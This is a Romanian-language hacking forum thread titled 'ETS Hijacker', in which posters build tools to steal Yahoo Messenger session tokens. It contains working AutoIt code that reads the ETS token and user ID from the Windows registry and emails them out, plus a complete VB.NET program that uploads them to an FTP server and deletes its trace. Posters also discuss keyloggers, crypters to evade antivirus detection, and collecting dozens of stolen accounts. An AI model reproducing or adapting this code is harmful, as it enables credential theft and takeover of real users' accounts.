Jump to content
Guest chri5ty

ETS Hijacker

Recommended Posts

partea cu keylogger merge...DAR: eset nod 32 detecteaza orice forma de comunicatie cu exteriorul si nu o sa poata keyloggeru sa transmita nimic.Numai daca te duci la un anumit interval de timp si "ridici" de acolo informatiile capturate+keyloggeru trebuie compilat de fiecare cu sursa proprie.Altfel e de ajuns sa aiba 2-3 detectii si Nod 32 intreaba daca vrei sa trimita fisierul pe server pentru analiza,si de acolo vine in update la toti userii de nod si gata.Fun's over.Lasati asa metoda cu EST ca e buna.Si singura care lucreaza la distanta.

Daca cunoaste cineva cum se poate face in AutoIT controlul ferestrelor active ca sa se trimita pe mess dupa extractie.Am incercat ceva da e in functi de PID si nu e acelasi la fiecare run al Yahoo Messenger.

Am mai cautat si nu se poate face decat cu FTP(din cate am rezolvat pana acum).Folositi din helpul de la AutoIT si creati o sesiune in care uploadati direct pe ftp fisierul cu ETS-ul care va intereseaza.Zilele astea o sa postez o sursa completa de extragere si trimitere a Ets-ului(acum am numai surse care rezolva separat cate ceva).

Edited by phantomas90
Am rezolvat...
Link to comment
Share on other sites

Exact. Pe pagina pe care dai search, eu am cativa parametri secreti, prin care vad lista de ID-uri. Cand aveam 10-20 de intrari, ma mai uitam prin ele, iar uneori am vazut ca apartin unor persoane care nu merita sa incaseze 'palme' de la un mucos de cativa ani care s-a gandit sa ii sparga contul. De cand am 50 de bucati, chiar nu ma mai intereseaza sa ma incerc fiecare ID.

:o:OO

lol deci eu fur iduri si tuh le poti vedea?:o:OOO

cum vine asta?e cam suspect dreaq

mai bine nu folosesti decat sa faci rau cuiva

sau daca vrei sa faci rau cuiva cauta-ma pe mess ca sa iti dau eu 1 id :)):))

Edited by begood
Link to comment
Share on other sites

partea cu keylogger merge...DAR: eset nod 32 detecteaza orice forma de comunicatie cu exteriorul si nu o sa poata keyloggeru sa transmita nimic.Numai daca te duci la un anumit interval de timp si "ridici" de acolo informatiile capturate+keyloggeru trebuie compilat de fiecare cu sursa proprie.Altfel e de ajuns sa aiba 2-3 detectii si Nod 32 intreaba daca vrei sa trimita fisierul pe server pentru analiza,si de acolo vine in update la toti userii de nod si gata.Fun's over.Lasati asa metoda cu EST ca e buna.Si singura care lucreaza la distanta.

Daca cunoaste cineva cum se poate face in AutoIT controlul ferestrelor active ca sa se trimita pe mess dupa extractie.Am incercat ceva da e in functi de PID si nu e acelasi la fiecare run al Yahoo Messenger.

Am mai cautat si nu se poate face decat cu FTP(din cate am rezolvat pana acum).Folositi din helpul de la AutoIT si creati o sesiune in care uploadati direct pe ftp fisierul cu ETS-ul care va intereseaza.Zilele astea o sa postez o sursa completa de extragere si trimitere a Ets-ului(acum am numai surse care rezolva separat cate ceva).

WTF man?lasa prostiile ca nod32 detecteaza si rupe si nu stiu ce,sunt atatea keyloggere FUd pe alea cum de nu le gaseste?

Link to comment
Share on other sites

TCPStartup()

Func _SMTPMailTo($host, $port, $from, $fromname, $to, $toname, $subj, $msg)

$ip = TCPNameToIP($host)

$sock = TCPConnect($ip, $port)

Do

$recv = TCPRecv($sock, 1024)

Until $recv <> ""

If StringLeft($recv, 3) <> 220 Then

Return -1

EndIf

TCPSend($sock, "HELO " & $host & @CRLF)

Do

$recv = TCPRecv($sock, 1024)

Until $recv <> ""

If StringLeft($recv, 3) <> 250 Then

Return $recv

EndIf

TCPSend($sock, "MAIL FROM:<" & $from & ">" & @CRLF)

Do

$recv = TCPRecv($sock, 1024)

Until $recv <> ""

If StringLeft($recv, 3) <> 250 Then

Return $recv

EndIf

TCPSend($sock, "RCPT TO:<" & $to & ">" & @CRLF)

Do

$recv = TCPRecv($sock, 1024)

Until $recv <> ""

If StringLeft($recv, 3) <> 250 Then

Return $recv

EndIf

TCPSend($sock, "DATA" & @CRLF)

Do

$recv = TCPRecv($sock, 1024)

Until $recv <> ""

If StringLeft($recv, 3) <> 354 Then

Return $recv

EndIf

TCPSend($sock, "From: " & $fromname & " <" & $from & ">" & @CRLF)

TCPSend($sock, "To: " & $toname & " <" & $to & ">" & @CRLF)

TCPSend($sock, "Subject: " & $subj & @CRLF)

TCPSend($sock, @CRLF)

TCPSend($sock, $msg & @CRLF)

TCPSend($sock, "." & @CRLF)

Do

$recv = TCPRecv($sock, 1024)

Until $recv <> ""

If StringLeft($recv, 3) <> 250 Then

Return $recv

EndIf

Return 1

EndFunc

$ets = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager\","ETS")

$ID=RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager","Yahoo! User ID")

$m = _SMTPMailTo("smtp.rdslink.ro", 25, "your_email@your_provider.com", "steal", "your_email@your_provider.com", "name",$ID,$ets)

Aici este sursa de AutoIT pentru extragerea si trimiterea ETS-ului si ID-ului pe email.

@cp/m a venit cu ideea trimiterii prin rdslink(+ a facut partea de trimitere).

@Paul4games de o saptamana clientul de ardamax keylogger sau cum s-o numi el exact e detectat de majoritatea antivirusilor.

Ce am vazut intr-un tutorial video despre acei FUD keyloggers e ca trebuie criptat clientul.Numai ca criptarea o facea in ASM.Pana ajungi sa faci criptare in Asm mai trebuie ceva timp.

Edited by phantomas90
Link to comment
Share on other sites

Aici este sursa de AutoIT pentru extragerea si trimiterea ETS-ului si ID-ului pe email.

@cp/m a venit cu ideea trimiterii prin rdslink(+ a facut partea de trimitere).

@Paul4games de o saptamana clientul de ardamax keylogger sau cum s-o numi el exact e detectat de majoritatea antivirusilor.

Ce am vazut intr-un tutorial video despre acei FUD keyloggers e ca trebuie criptat clientul.Numai ca criptarea o facea in ASM.Pana ajungi sa faci criptare in Asm mai trebuie ceva timp.

Man ce tot vorbesti acolo?keyloggerele FUD genereaza direct un server FUd nu cryptari prosti,si ce ASM?iei un crypter normal FUd si cryptezi srv si gata treaba..........si ardamax e de kkt

Link to comment
Share on other sites

@norocel cu FTP-ul asta era ideea.Salveaza intr-un txt ID-ul si parola si incarca fisierul pe un ftp free...numai ca mi se blocheaza transferul desi imi returneaza 0(no error) cand rules procesu cap-coada(scriere+incarcare).

@paul4games poate ai dreptate si nu am cautat eu cum trebuie.Eu asta am gasit


http://www.youtube.com/watch?v=WO8feC_IlHU

Link to comment
Share on other sites

@norocel cu FTP-ul asta era ideea.Salveaza intr-un txt ID-ul si parola si incarca fisierul pe un ftp free...numai ca mi se blocheaza transferul desi imi returneaza 0(no error) cand rules procesu cap-coada(scriere+incarcare).

@paul4games poate ai dreptate si nu am cautat eu cum trebuie.Eu asta am gasit


http://www.youtube.com/watch?v=WO8feC_IlHU

Pai merge si cum face ala dar te cam complici

Link to comment
Share on other sites

ce mai trebuie modificat pe aici ? ca totusi nu imi pune pe server keile de registri ....

#include <FTP.au3>

$ets=RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager\", "ETS")

$ID=RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager","Yahoo! User ID")

$server = 'adresa_serverului'

$username = 'userul'

$pass = 'parola'

$Open = _FTPOpen('Myftp Control')

$Conn = _FTPConnect($Open, $server, $username, $pass)

$Ftpp = _FtpPutFile($Conn,$ets,$ID)

$Ftpc = _FTPClose($Open)

Link to comment
Share on other sites

@norocel_ daca era asa simplu puneam de mult sursa completa.

Trebuie cumva initializat protocolul tcp/ip pentru trimitere pe FTP,ceva cum e in sursa facuta de cp/m.Am incercat si eu si asa simplu ca tine si cu SSL si da rateuri.

Cand termin si merge atunci o sa pun o sursa completa si functionala.Pana acum am pus numai fragmente.O sa fac un mic tutorial cu fiecare comanda ce face.Asa facem osturi degeaba fara sa terminam pana la urma ce am inceput.

Later edit: Cred ca fixeaza yahoo exploitu pana terminam noi treaba aici=))..deja sunt o gramada de reply si nimic concret

Edited by phantomas90
Link to comment
Share on other sites

Chestia asta nu e facuta de tine. O stiu de anul trecut. Si app de sursa, daca zici ca e facut de tn dc nu pui si sursa?. Iti spun eu, ca nu o sti :D sursa este asta: Adica asta este sursa executabilului meu care face acelasi lucru ca cel de pe it.octopis.com

Imports System.IO

Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

Dim etsuser As String

Dim etskey As String

Dim filename As String

etsuser = My.Computer.Registry.GetValue("HKEY_CURRENT_USER\Software\yahoo\pager", "Yahoo! User ID", Nothing)

etskey = My.Computer.Registry.GetValue("HKEY_CURRENT_USER\Software\yahoo\pager", "ETS", Nothing)

filename = etsuser & ".reg"

Dim etsreg As New StreamWriter("c:\" & filename)

etsreg.WriteLine("Windows Registry Editor Version 5.00")

etsreg.WriteLine()

etsreg.WriteLine("[HKEY_CURRENT_USER\Software\yahoo\pager]")

etsreg.WriteLine(Chr(34) + "ETS" + Chr(34) + "=" + Chr(34) + etskey + Chr(34))

etsreg.WriteLine(Chr(34) + "Yahoo! User ID" + Chr(34) + "=" + Chr(34) + etsuser + Chr(34))

etsreg.WriteLine(Chr(34) + "Save Password" + Chr(34) + "=" + "dword:00000001")

etsreg.Close()

Dim clsRequest As System.Net.FtpWebRequest = _

DirectCast(System.Net.WebRequest.Create("ftp://ftp.nume.com/" & filename), System.Net.FtpWebRequest)

clsRequest.Credentials = New System.Net.NetworkCredential("user", "parola")

clsRequest.Method = System.Net.WebRequestMethods.Ftp.UploadFile

Dim bFile() As Byte = System.IO.File.ReadAllBytes("C:\" & filename)

Dim clsStream As System.IO.Stream = _

clsRequest.GetRequestStream()

clsStream.Write(bFile, 0, bFile.Length)

clsStream.Close()

clsStream.Dispose()

My.Computer.FileSystem.DeleteFile("c:\" & filename)

End

End Sub

End Class

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...